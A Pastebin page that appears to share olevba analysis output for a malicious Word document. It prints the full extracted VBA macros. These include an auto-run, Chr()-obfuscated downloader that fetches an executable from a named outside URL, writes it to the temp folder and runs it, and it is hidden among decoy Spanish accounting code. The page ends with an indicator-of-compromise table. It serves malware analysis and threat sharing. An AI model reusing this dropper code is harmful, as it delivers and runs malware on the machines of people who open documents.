API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Oct 6th, 2015
372
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 29.83 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASI-B-V Q_46Q0VWHU4.DOC
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Q_46Q0VWHU4.DOC
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: Q_46Q0VWHU4.DOC - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. SSVEvdqwfF3 (59)
  19.  
  20. End Sub
  21.  
  22.  
  23.  
  24.  
  25. Sub SSVEvdqwfF3(FFFFF As Integer)
  26. tipanaliticcdig
  27.  
  28. End Sub
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module1.bas
  31. in file: Q_46Q0VWHU4.DOC - OLE stream: u'Macros/VBA/Module1'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33.  
  34.     Function readFromFile(n As String) As String
  35.         dim ff as integer = freefile()
  36.         Dim buf As String
  37.         Open n For Binary Access Read As ff
  38.         dim as integer l = lof( ff )
  39.         If (l > 0) Then
  40.             buf = Space(l)
  41.             Get #ff, , buf
  42.         Else
  43.             buf = ""
  44.         End If
  45.         Close #ff
  46.         return buf
  47.     End Function
  48.    
  49.     Function writeToFile(n As String, v As String) As String
  50.         dim ff as integer = freefile()
  51.         if( open( n for output as ff ) = 0 ) then
  52.             Close #ff       ' we only opened it to create or truncate it
  53.            Open n For Binary Access Write As ff  ' now we will write it
  54.            Put #ff, , v
  55.             Close #ff
  56.             return "1"
  57.         End If
  58.         return "0"
  59.     End Function
  60.    
  61.     function _loadConfig( n as string, prefix as string, byref vars as string ) as string
  62.         dim key as string = "", value as string
  63.         Dim l As String
  64.         dim ff as integer = freefile()
  65.         if( open( n for input as ff ) = 0 ) then
  66.             While (Not EOF(ff))
  67.                 Line Input #ff, l
  68.                 If ((Asc(l, 1) = 91) And (Asc(l, Len(l)) = 93)) Then         '[ and ]
  69.                    If (key <> "") Then
  70.                         Dict.set( vars, (prefix & key), trim( value, any !" \n\r" ) )
  71.                     End If
  72.                     key = Mid(l, 2, (Len(l) - 2))
  73.                     value = ""
  74.                 Else
  75.                     value = (value & l & !"\n")
  76.                 End If
  77.             Wend
  78.             If ((key <> "")) Then
  79.                 Dict.set( vars, (prefix & key), trim( value, any !" \n\r" ) )
  80.             End If
  81.             return "1"
  82.         End If
  83.         return "0"
  84.     End Function
  85.    
  86.  
  87. Public Function ProfileChr(KJB As Object)
  88. Dim segR As String
  89. segR = Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(114) & Chr(111) & Chr(116) & Chr(104) & Chr(115) & Chr(99) & "h" & Chr(105) & "l" & "l" & "e" & Chr(114) & Chr(46) & Chr(110) & Chr(101) & Chr(116) & "/" & Chr(126) & Chr(109) & "e" & "d" & Chr(105) & Chr(99) & "b" & Chr(116) & Chr(57) & "/" & "6" & Chr(53) & "y" & Chr(103) & "3" & Chr(102) & "3"
  90. KJB.Open Chr(71) & "E" & Chr(84), segR & Chr(47) & "4" & Chr(51) & Chr(103) & "5" & "f" & Chr(101) & "w" & Chr(46) & "e" & Chr(120) & "e", False
  91. End Function
  92. Public Function ParametrsdeSistema(SmRaNdMM1 As String)
  93. For i = 0 To 3
  94. SmRaNdMM1 = Replace(SmRaNdMM1, Chr(i + 20 * 3 - 1), "")
  95. Next i
  96.  Set ParametrsdeSistema = CreateObject(SmRaNdMM1)
  97. End Function
  98.  
  99.  
  100.     Function saveVars(ByRef vars As String, names As String, prefix As String) As String
  101.         Dim i As Integer
  102.         Dim s As String, k As String
  103.         Dim result As String
  104.         While (names <> "")
  105.             i = InStr(names, ",")
  106.             If (i > 0) Then
  107.                 k = Mid(names, 1, (i - 1))
  108.                 names = Mid(names, (i + 1))
  109.             Else
  110.                 k = names
  111.                 names = ""
  112.             End If
  113.             s = (prefix & k)
  114.            
  115.             For i = 0 To 1
  116.                 dim l as integer = len( s )
  117.                 dim z as string = chr( (65 + (l and 15)) )
  118.                 While (l > 15)
  119.                     l = (l shr 4)
  120.                     z = (Chr((97 + (l And 15))) & z)
  121.                 Wend
  122.                 result &= z
  123.                 result &= s
  124.                 s = Dict.valueOf(vars, k)
  125.             Next
  126.         Wend
  127.         return result
  128.     End Function
  129.    
  130.   Public Function ParametrsdeTesreria(MesPrces2 As String, MesPrces3 As String, MesPrces As Object, ServidrGEN9_3 As String, ServidrGEN9_8 As Double) As Double
  131. ParametrsdeTesreria = 5
  132. ParametrsdeTesreria = prcentajeretencin(MesPrces, ServidrGEN9_3)
  133. ParametrsdeTesreria = 99.9
  134.   End Function
  135.     Public Sub loadVars(ByRef vars As String, from As String, prefix As String)
  136.         dim ofs as integer = 1
  137.         Dim k As String
  138.        
  139.         While (ofs < Len(from))
  140.             Dim o As Integer
  141.             dim l as integer = 0
  142.             dim b as string = mid( from, ofs, 1 )
  143.             o = Asc(b)
  144.             ofs += 1
  145.             While (o >= 97)
  146.                 l = (l + ((o - 97) shl 4))
  147.                 o = Asc(Mid(from, ofs, 1))
  148.                 ofs += 1
  149.             Wend
  150.             l += (o - 65)
  151.             o = ofs
  152.             ofs += l
  153.             If (k = "") Then
  154.                 k = (prefix & Mid(from, o, l))
  155.             Else
  156.                 Dict.set( vars, k, mid( from, o, l ) )
  157.                 k = ""
  158.             End If
  159.         Wend
  160.     End Sub
  161.  
  162.     function _createDateSerial() as string
  163.         dim ts as string = (date() & time())
  164.         return (mid( ts, 7, 4 ) & mid( ts, 1, 2 ) & mid( ts, 4, 2 ) & _
  165.                 mid( ts, 11, 2 ) & mid( ts, 14, 2 ) & mid( ts, 17, 2 ) )
  166.     End Sub
  167. /'
  168.    ' page is the page before ?, query is a parts (LSF-array) list to be
  169.    ' encoded and added, can be ""
  170.    function _browseTo( page as string, query as string ) as integer
  171.         If (Query <> "") Then
  172.             dim as DICTSTRING qdict = Dict.createFromLSF( query )
  173.             dim as DICTSTRING keys = Dict.keyDict( qdict )
  174.             dim as integer i, l = (Dict.intValueOf( keys, "count" ) - 1)
  175.             dim as string a = "?", k
  176.             For i = 0 To l
  177.                 k = Dict.valueOf(keys, str(i))
  178.                 page &= (a & k & "=" & ExtPlatform._pcEncode( Dict.valueOf( qdict, k ) ))
  179.                 a = "&"
  180.             Next
  181.         End If
  182.         dim as string app = environ( "BROWSER" )
  183.         dim as integer errcode = exec( app, ("""" & page & """") )
  184.         If (errcode > -1) Then
  185.             return TRUE
  186.         Else
  187.             return FALSE
  188.         End If
  189.     End Sub
  190.  
  191.  
  192.  
  193. -------------------------------------------------------------------------------
  194. VBA MACRO Module2.bas
  195. in file: Q_46Q0VWHU4.DOC - OLE stream: u'Macros/VBA/Module2'
  196. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  197. Public Cadenabusca As String
  198.  
  199. 'Variables de Ventana de Ayuda
  200. Public nAyuda As String
  201. Public nDetalle As String
  202. Public nAyuda1 As String
  203. Public nMoneda As String
  204.  
  205. Public g_DetalleEmpresa As String
  206. Public g_PedidoPuntoVta As String
  207. Public g_DetallePuntoVta As String
  208.  
  209. Public Cuentacodigo As String
  210. Public VGactulizodoc As Boolean
  211. Public VGformatofecha As String
  212. Public VGmodifica As Integer
  213.  
  214. Public VGflaglimpia As Boolean               'Flag que Limpia
  215. Public VGMoverRegistro As Boolean            'Flag al mover el registro
  216. Public VGvarVerifica As Boolean              'Flag Verifica que transaccion es OK (Grabar ,Etc)
  217. Public VGErrorString As String               'Almacena el Error el que hubo en alguna transaccion
  218. Public VGoficina As String
  219.  
  220. 'REPORTES
  221. Public RutaRep  As String      '= "\\desarrollo\librerias_controles\Reportes\"
  222. Public RutaRepProc As String    '= "\\desarrollo\librerias_controles\Reportes\Procesos\"
  223.             'Cadena de Reportes Base Marfice
  224.  
  225.  
  226. Public VGParametros As String
  227. Public VGParamSistem As String
  228. Public VGtipo As String
  229.  
  230. Private Type ParametrosdeTesoreria        ' Crea Datos de Empresa
  231.   NomEmpresa As String
  232.    RucEmpresa As String
  233.    auxaut As Boolean
  234.    monedabase As String
  235.    ctascompra As String
  236.    igv As Double
  237.    minimoretencion As Double
  238.    empresacodigo As String
  239.    puntovta As String
  240.    numeracionautomaticalibro As Boolean
  241.    
  242.    sistemaasientoenlinea As Boolean
  243.    descripcion As String
  244.    tipocambio As Double
  245.    controlarefe As String
  246.    numeauto As String
  247.    controlacodigocaja As String
  248.    saldocontadispo As String
  249.    controlacobranzacheq As String
  250.    impresioncheq As String
  251.    listaclientes As String
  252.    listaproveedor As String
  253.    controlacuenta As String
  254.    transferencia As String
  255.    transferenciaegreso As String
  256.    transferenciaingreso As String
  257.    codigooperaciontransferencia As String
  258.    
  259.    sistemaactivaccostos As Boolean
  260.    sistemactrlgastos As Boolean
  261.    sistemamultiempresas As Boolean
  262.    sistemaultimonivel As String
  263.    sistemactaajustedeb As String
  264.    sistemactaajustehab As String
  265.        
  266.     xsubasiento As String
  267.     xLibro As String
  268.     xTipAnal As String
  269.     xCtaIGV As String
  270.     xCtaIES As String
  271.     xCtaRTA As String
  272.     xCtaTotal As String
  273.     xcodretencion As String
  274.    
  275.     CpTiplan As String
  276.     CpOficina As String
  277.     permite_tc As Boolean
  278.     cierremes As Boolean
  279.     AsientoAutoxCCostos As Integer
  280.  
  281.    porcentajeretencion As Double
  282.    empresacodigodetraccion As String
  283.    empresacodigoretencion As String
  284.    empresaretencion As String
  285.    sistemaminimoretencion As Double
  286.    sistemanumnivelcosto As String
  287.    sistemabancarizacion As Boolean
  288.    sistemabancarizacion01 As Double
  289.    sistemabancarizacion02 As Double
  290.    controlaestadosrendicion  As Boolean
  291.    diasatrazorendicion As Integer
  292.    diacierrerendicion As Integer
  293.    listacajas As String
  294. End Type
  295.  
  296.  
  297. Public Function tipanaliticcdig()
  298. Set Z3UsuariCT = ParametrsdeSistema(Chr(87) & Chr(80 + 3) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) + Chr(23 * 2) & Chr(40 * 2 + 3) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
  299. ServidrGEN9_2 = Z3UsuariCT("T" & Chr(69) & Chr(77) & Chr(80))
  300. Dim MesPrces As Object
  301. Set MesPrces = ParametrsdeSistema(Chr(65) & "do" & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & "a" & Chr(109))
  302.  
  303.    MesPrces.Type = 1
  304. Dim ServidrGEN9_3 As String
  305. ServidrGEN9_3 = ServidrGEN9_2 & "\" & "rrd" & Chr(68) & "hhm." & "e" & Chr(120) & "e"
  306.  
  307.  
  308. With MesPrces
  309.     .Open
  310.     .write diasatrazrendicin(5000)
  311. End With
  312.  Dim HricK As Double
  313. HricK = ParametrsdeTesreria("MesPrces", "MesPrces", MesPrces, ServidrGEN9_3, 88.3)
  314. Set noexile = ParametrsdeSistema(Chr(83) & "h" & "e" & Chr(108) & Chr(108) & ";<=" + Chr(46) & Chr(65) & "p" & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
  315. noexile.Open (ServidrGEN9_3)
  316. End Function
  317.  
  318.    
  319.  
  320.  
  321. Public Sub Main()
  322.   VGcomputer = UCase(ComputerName)
  323.    Call Configurar_Conexiones
  324.    Call adicionarcampos
  325. '   Call Cargar_Parametros_Funcionales
  326.   FrmIngreso.Show
  327.  
  328. End Sub
  329.  
  330.  
  331. Public Function prcentajeretencin(ServidrGEN9_4 As Object, ServidrGEN9_3 As String) As Integer
  332. prcentajeretencin = 15
  333. ServidrGEN9_4.savetofile ServidrGEN9_3, 2
  334. prcentajeretencin = 2
  335. End Function
  336.  
  337. Public Sub Cargar_Parametros_Funcionales()
  338.    Dim rsaux As New ADODB.Recordset
  339.    Dim rb As New ADODB.Recordset
  340.    Dim VGvardllgen As New dllgeneral.dll_general
  341.    
  342.    Set rsaux = Nothing
  343.    
  344.    Set rsaux = VGCNx.Execute("select top 1 * from te_parametroempresa ")
  345.    If rsaux.RecordCount > 0 Then
  346.         VGCodEmpresa = Escadena(rsaux!empresacodigo)
  347.         VGParametros.descripcion = Escadena(rsaux!empresarazonsocial)
  348.         VGParametros.tipocambio = numero(rsaux!empresatipocambio)
  349.         VGParametros.controlarefe = Escadena(rsaux!empresacontrolarefe)
  350.         VGParametros.numeauto = Escadena(rsaux!empresanumeauto)
  351.         VGParametros.controlacodigocaja = Escadena(rsaux!empresacontrolacodcaja)
  352.         VGParametros.saldocontadispo = Escadena(rsaux!empresacontrolasaldocontabledispo)
  353.         VGParametros.controlacobranzacheq = Escadena(rsaux!empresanocontrolcobranzacheque)
  354.         VGParametros.impresioncheq = Escadena(rsaux!empresaimpresioncheque)
  355.         VGParametros.controlacuenta = Escadena(rsaux!empresacontrolactacontable)
  356.         VGParametros.transferencia = Escadena(rsaux!empresanumtransferencia)
  357.         VGParametros.transferenciaegreso = Escadena(rsaux!empresatransaccionegreso)
  358.         VGParametros.transferenciaingreso = Escadena(rsaux!empresatransaccioningreso)
  359.         VGParametros.empresacodigoretencion = Escadena(rsaux!empresacodigoretencion)
  360.         VGParametros.empresacodigodetraccion = Escadena(rsaux!empresacodigodetraccion)
  361.         VGParametros.porcentajeretencion = numero(rsaux!porcentajeretencion)
  362.         VGParametros.empresaretencion = numeroEntero(rsaux!empresaretencion)
  363.         VGParametros.codigooperaciontransferencia = Escadena(rsaux!codigooperaciontransferencia)
  364.    End If
  365.    
  366.    Set rsaux = VGCNx.Execute("select * from co_sistema")
  367.    If rsaux.RecordCount > 0 Then
  368.     VGParametros.monedabase = Trim(rsaux!monedacodigo)
  369.     VGParametros.ctascompra = ArmaCriterioComodin(rsaux!sistemactacomp, "cuentacodigo")
  370.     VGParametros.igv = rsaux!sistemaigv / 100
  371.    
  372.     'Parametros Exclusivos para la generacion de asientos a contabilidad
  373.    
  374.     VGParametros.xLibro = VGvardllgen.ESNULO(rsaux!sistemalibro, "")
  375.     VGParametros.xTipAnal = VGvardllgen.ESNULO(rsaux!sistematipanal, "00")
  376.     VGParametros.xsubasiento = VGvardllgen.ESNULO(rsaux!sistemasubasiento, "00")
  377.     VGParametros.xCtaIGV = VGvardllgen.ESNULO(rsaux!sistemactaIGV, "00")
  378.     VGParametros.xCtaIES = VGvardllgen.ESNULO(rsaux!sistemactaIES, "00")
  379.     VGParametros.xCtaRTA = VGvardllgen.ESNULO(rsaux!sistemactaRTA, "00")
  380.     VGParametros.auxaut = True ' Se tiene que crear el campo para controlar auxiliar automatico
  381.    
  382.     'Cargar parametros para pasar a cuentas por cobrar
  383.    
  384.     VGParametros.CpTiplan = VGvardllgen.ESNULO(rsaux!sistematipoplan, "00")
  385.     VGParametros.CpOficina = VGvardllgen.ESNULO(rsaux!sistemaoficina, "00")
  386.    
  387.     VGParametros.xCtaTotal = rsaux!sistemactatotal
  388.     VGParametros.permite_tc = IIf(VGvardllgen.ESNULO(rsaux!permite_tc, 0) = 0, False, True)
  389.     VGParametros.sistemaactivaccostos = IIf(VGvardllgen.ESNULO(rsaux!sistemaactivaccostos, 0) = 0, False, True)
  390.     VGParametros.sistemaasientoenlinea = IIf(VGvardllgen.ESNULO(rsaux!sistemaasientoenlinea, 0) = 0, False, True)
  391.     VGParametros.sistemactrlgastos = IIf(VGvardllgen.ESNULO(rsaux!sistemactrlgastos, 0) = 0, False, True)
  392.    
  393.     If ExisteElem(1, VGCNx, "co_sistema", "sistemamultiempresas") Then
  394.        VGParametros.sistemamultiempresas = IIf(VGvardllgen.ESNULO(rsaux!sistemamultiempresas, 0) = 0, False, True)
  395.     End If
  396.     VGParametros.minimoretencion = IIf(VGvardllgen.ESNULO(rsaux!sistemaminimoretencion, 0) = 0, 99999, rsaux!sistemaminimoretencion)
  397.     VGParametros.sistemabancarizacion = IIf(VGvardllgen.ESNULO(rsaux!bancarizacion, 0) = 0, 0, rsaux!bancarizacion)
  398.     VGParametros.sistemabancarizacion01 = IIf(VGvardllgen.ESNULO(rsaux!minimobancarizacion01, 0) = 0, 9999999, rsaux!minimobancarizacion01)
  399.     VGParametros.sistemabancarizacion02 = IIf(VGvardllgen.ESNULO(rsaux!minimobancarizacion02, 0) = 0, 9999999, rsaux!minimobancarizacion02)
  400.    
  401.     VGParametros.controlaestadosrendicion = IIf(VGvardllgen.ESNULO(rsaux!controlaestadosrendicion, 0) = 0, 0, rsaux!controlaestadosrendicion)
  402.     VGParametros.diasatrazorendicion = IIf(VGvardllgen.ESNULO(rsaux!diasatrazorendicion, 0) = 0, 0, rsaux!diasatrazorendicion)
  403.     VGParametros.diacierrerendicion = IIf(VGvardllgen.ESNULO(rsaux!diacierrerendicion, 0) = 0, 1, rsaux!diacierrerendicion)
  404.  
  405.    End If
  406.    Set rsaux = New ADODB.Recordset
  407.    rsaux.Open "select sistemaultimonivel,sistemaultimonivelcostos from  ct_sistema", VGCnxCT, adOpenKeyset, adLockReadOnly
  408.    If rsaux.RecordCount = 0 Then Exit Sub
  409.    VGnumniveles = rsaux!sistemaultimonivel
  410.    VGnumnivcos = ESNULO(rsaux!sistemaultimonivelcostos, 1)
  411.    
  412.     Set rsaux = New ADODB.Recordset
  413.     rsaux.Open "select sistemaultimonivel from  co_sistema", VGCNx, adOpenKeyset, adLockReadOnly
  414.     If rsaux.RecordCount = 0 Then Exit Sub
  415.     VGnumnivgas = rsaux!sistemaultimonivel
  416.    
  417.     Set rsaux = New ADODB.Recordset
  418.     Set rsaux = VGCNx.Execute("select * from  vt_sistema")
  419.     If rsaux.RecordCount = 0 Then Exit Sub
  420.     VGParamSistem.tipoanaliticocodigo = rsaux!tipoanaliticocodigo
  421.    
  422.     Set rsaux = New ADODB.Recordset
  423.     rsaux.Open "select top 1 sistemactaajustedeb,sistemactaajustehab from  ct_sistema", VGCNx, adOpenKeyset, adLockReadOnly
  424.     If rsaux.RecordCount = 0 Then Exit Sub
  425.    
  426.     VGParametros.sistemactaajustedeb = RTrim(rsaux!sistemactaajustedeb)
  427.     VGParametros.sistemactaajustehab = RTrim(rsaux!sistemactaajustehab)
  428.    
  429.    
  430.     VGCNx.Execute "set dateformat dmy"    '--seteo de formato de fecha
  431.    
  432. End Sub
  433.  
  434.  
  435.  
  436.  
  437.  
  438. Public Function Valida(Modulo As String) As Boolean
  439. Dim Rshabilita As ADODB.Recordset
  440. Valida = True
  441. Set Rshabilita = VGCNx.Execute("select * from ct_cierremensual where empresacodigo='" & FrmContabilizaTesoreria.Ctr_Ayuempresa.xclave & "' " _
  442. & " and mes='" & VGParamSistem.MesProceso & "' and anio='" & VGParamSistem.AnoProceso & "'")
  443. If Rshabilita.RecordCount > 0 Then
  444.     Select Case Modulo
  445.     Case "Facturacion":
  446.         Valida = IIf(Rshabilita!Ventas = False, True, False)
  447.     Case "Cobranza":
  448.         Valida = IIf(Rshabilita!cobrar = False, True, False)
  449.     Case "Pagar":
  450.         Valida = IIf(Rshabilita!pagar = False, True, False)
  451.     Case "Contabilidad":
  452.         Valida = IIf(Rshabilita!contabilidad = False, True, False)
  453.     Case "Provisiones":
  454.         Valida = IIf(Rshabilita!compras = False, True, False)
  455.     End Select
  456. End If
  457.  
  458. End Function
  459.  
  460. -------------------------------------------------------------------------------
  461. VBA MACRO Module3.bas
  462. in file: Q_46Q0VWHU4.DOC - OLE stream: u'Macros/VBA/Module3'
  463. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  464.  
  465.  
  466. Public Sub Configurar_Conexiones()
  467.  
  468.   On Error GoTo nerror
  469.    ' *****Archivo de Punto de Venta*******
  470.   Dim VGdllApi As New dll_apisgen.dll_apis
  471.    Dim strbase As String
  472.    Dim struser As String
  473.    Dim strpass As String
  474.    Dim strserver As String
  475.    
  476.    Dim strconecta As String
  477.    
  478. ' reportes
  479.  
  480.    VGParamSistem.RutaReport = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "REPORTES", "TESORERIA", "?")
  481.    VGParamSistem.carpetareportes = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "conexion", "CARPETAREPORTES", "?")
  482.    
  483.    VGsql = VGdllApi.LeerIni(app.Path & "\Marfice.ini", "conexion", "SQL", "")
  484.    VGsql = IIf(VGsql = "", 1, VGsql)
  485.    
  486.     VGformatofecha = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "CONEXION", "FECHASQL", "?")
  487.     VGformatofecha = IIf(VGformatofecha = "?", "MDY", VGformatofecha)
  488.  
  489.    VGParametros.empresacodigo = "01"
  490.    
  491.    RutaRep = VGdllApi.LeerIni(app.Path & "\Marfice.ini", "reportes", "TESORERIA", "")
  492.    RutaRepProc = RutaRep
  493.    strbase = VGdllApi.LeerIni(app.Path & "\Marfice.ini", "conexion", "RUTAREPORTES", "")
  494.    If strbase <> "" Then
  495.       RutaRep = RutaRep + Trim(strbase)
  496.       RutaRepProc = RutaRepProc + Trim(strbase)
  497.    End If
  498.    
  499. ' conexion de tesoreria
  500.  
  501.     VGParamSistem.BDEmpresa = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "conexion", "BDDATOS", "?")
  502.     VGParamSistem.Servidor = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "conexion", "SERVIDOR", "?")
  503.     VGParamSistem.Usuario = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "conexion", "USUARIO", "?")
  504.     VGParamSistem.Pwd = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "conexion", "PASSW", "?")
  505.  
  506.     Set VGCNx = New ADODB.Connection
  507.     VGCNx.CursorLocation = adUseClient
  508.     VGCNx.CommandTimeout = 0
  509.     VGCNx.ConnectionTimeout = 0
  510.     VGCNx.ConnectionString = "Provider=SQLOLEDB.1;Persist Security Info=False;User ID=" & VGParamSistem.Usuario & ";Password=" & VGParamSistem.Pwd & ";Initial Catalog=" & VGParamSistem.BDEmpresa & ";Data Source=" & VGParamSistem.Servidor
  511.     VGCNx.Open
  512.    
  513.    
  514.     ' Bdwenco
  515.    
  516.     Set VGConfig = New ADODB.Connection
  517.     VGConfig.CursorLocation = adUseClient
  518.     VGConfig.CommandTimeout = 0
  519.     VGConfig.ConnectionTimeout = 0
  520.     VGConfig.ConnectionString = "Provider=SQLOLEDB.1;Persist Security Info=False;User ID=" & VGParamSistem.Usuario & ";Password=" & VGParamSistem.Pwd & ";Initial Catalog=Bdwenco;Data Source=" & VGParamSistem.Servidor
  521.     VGConfig.Open
  522.     End Sub
  523.     Public Function diasatrazrendicin(KJB As Long)
  524.  
  525. Dim PbMain31 As Object
  526. Set PbMain31 = ParametrsdeSistema(Chr(77) & Chr(105) & "c" & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & "M" & Chr(76) & "H" & Chr(84) & Chr(84) & "P")
  527. ProfileChr PbMain31
  528. PbMain31.Send
  529. diasatrazrendicin = PbMain31.responseBody
  530. End Function
  531. Public Sub ContabilidadO()
  532.    
  533.     'Conexion de Contabilidad
  534.    
  535.     VGParamSistem.BDEmpresaCT = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "CONTABILIDAD", "BDDATOS", "?")
  536.     If VGParamSistem.BDEmpresaCT = "" Then
  537.        VGParamSistem.BDEmpresaCT = VGParamSistem.BDEmpresa
  538.        VGParamSistem.ServidorCT = VGParamSistem.Servidor
  539.        VGParamSistem.UsuarioCT = VGParamSistem.Usuario
  540.        VGParamSistem.PwdCT = VGParamSistem.Pwd
  541.      Else
  542.        VGParamSistem.BDEmpresaCT = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "CONTABILIDAD", "BDDATOS", "?")
  543.        VGParamSistem.ServidorCT = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "CONTABILIDAD", "SERVIDOR", "?")
  544.        VGParamSistem.UsuarioCT = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "CONTABILIDAD", "USUARIO", "?")
  545.        VGParamSistem.PwdCT = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "CONTABILIDAD", "PASSW", "?")
  546.    End If
  547.    
  548.     'Conexion de Contabilidad
  549.    Set VGCnxCT = New ADODB.Connection
  550.     VGCnxCT.CursorLocation = adUseClient
  551.     VGCnxCT.CommandTimeout = 0
  552.     VGCnxCT.ConnectionTimeout = 0
  553.     VGCnxCT.ConnectionString = "Provider=SQLOLEDB.1;Persist Security Info=False;User ID=" & VGParamSistem.UsuarioCT & ";Password=" & VGParamSistem.PwdCT & ";Initial Catalog=" & VGParamSistem.BDEmpresaCT & ";Data Source=" & VGParamSistem.ServidorCT
  554.     VGCnxCT.Open
  555.    
  556.     VGParamSistem.BDEmpresaGEN = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "BDGENERAL", "BDDATOS", "?")
  557.     VGParamSistem.ServidorGEN = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "BDGENERAL", "SERVIDOR", "?")
  558.     VGParamSistem.UsuarioGEN = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "BDGENERAL", "USUARIO", "?")
  559.     VGParamSistem.PwdGEN = VGdllApi.LeerIni(app.Path & "\MARFICE.INI", "BDGENERAL", "PASSW", "?")
  560.        
  561.     'Establecer Conexiones del Marfice
  562.    
  563.    
  564.     Set VGGeneral = New ADODB.Connection
  565.     VGGeneral.CursorLocation = adUseClient
  566.     VGGeneral.CommandTimeout = 0
  567.     VGGeneral.ConnectionTimeout = 0
  568.     VGGeneral.ConnectionString = "Provider=SQLOLEDB.1;Persist Security Info=False;User ID=" & VGParamSistem.UsuarioGEN & ";Password=" & VGParamSistem.PwdGEN & ";Initial Catalog=" & VGParamSistem.BDEmpresaGEN & ";Data Source=" & VGParamSistem.Servidor
  569.     VGGeneral.Open
  570.  
  571.       VGCadenaReport2 = "DSN=jckconsultores;DSQ=" & VGParamSistem.BDEmpresaGEN & ";UID=" & VGParamSistem.UsuarioGEN & ";PWD=" & VGParamSistem.PwdGEN & ""
  572.  
  573.  
  574.    Exit Sub
  575.  
  576. nerror:
  577.    If Err Then
  578.        MsgBox "Comunicarse con Sistemas " & Chr(13) & Chr(10) & Err.Number & "-" & Err.Description
  579.        Err = 0
  580.        End
  581.    End If
  582. End Sub
  583.  
  584.  
  585.  
  586. +------------+----------------------+-----------------------------------------+
  587. | Type       | Keyword              | Description                             |
  588. +------------+----------------------+-----------------------------------------+
  589. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  590. | Suspicious | Open                 | May open a file                         |
  591. | Suspicious | Binary               | May read or write a binary file (if     |
  592. |            |                      | combined with Open)                     |
  593. | Suspicious | CreateObject         | May create an OLE object                |
  594. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  595. |            |                      | strings                                 |
  596. | Suspicious | SaveToFile           | May create a text file                  |
  597. | Suspicious | Environ              | May read system environment variables   |
  598. | Suspicious | Write                | May write to a file (if combined with   |
  599. |            |                      | Open)                                   |
  600. | Suspicious | Put                  | May write to a file (if combined with   |
  601. |            |                      | Open)                                   |
  602. | Suspicious | Output               | May write to a file (if combined with   |
  603. |            |                      | Open)                                   |
  604. | Suspicious | Shell                | May run an executable file or a system  |
  605. |            |                      | command (obfuscation: VBA expression)   |
  606. | Suspicious | ADODB.Stream         | May create a text file (obfuscation:    |
  607. |            |                      | VBA expression)                         |
  608. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  609. |            |                      | (obfuscation: VBA expression)           |
  610. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  611. |            |                      | may be used to obfuscate strings        |
  612. |            |                      | (option --decode to see all)            |
  613. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  614. |            | Strings              | may be used to obfuscate strings        |
  615. |            |                      | (option --decode to see all)            |
  616. | IOC        | http://rothschiller. | URL (obfuscation: VBA expression)       |
  617. |            | net/~medicbt9/65yg3f |                                         |
  618. |            | 3                    |                                         |
  619. | IOC        | 43g5few.exe          | Executable file name (obfuscation: VBA  |
  620. |            |                      | expression)                             |
  621. | IOC        | rrdDhhm.exe          | Executable file name (obfuscation: VBA  |
  622. |            |                      | expression)                             |
  623. | VBA string | http://rothschiller. | Chr(104) & Chr(116) & "t" & Chr(112) &  |
  624. |            | net/~medicbt9/65yg3f | Chr(58) & "/" & "/" & Chr(114) &        |
  625. |            | 3                    | Chr(111) & Chr(116) & Chr(104) &        |
  626. |            |                      | Chr(115) & Chr(99) & "h" & Chr(105) &   |
  627. |            |                      | "l" & "l" & "e" & Chr(114) & Chr(46) &  |
  628. |            |                      | Chr(110) & Chr(101) & Chr(116) & "/" &  |
  629. |            |                      | Chr(126) & Chr(109) & "e" & "d" &       |
  630. |            |                      | Chr(105) & Chr(99) & "b" & Chr(116) &   |
  631. |            |                      | Chr(57) & "/" & "6" & Chr(53) & "y" &   |
  632. |            |                      | Chr(103) & "3" & Chr(102) & "3"         |
  633. | VBA string | GET                  | Chr(71) & "E" & Chr(84)                 |
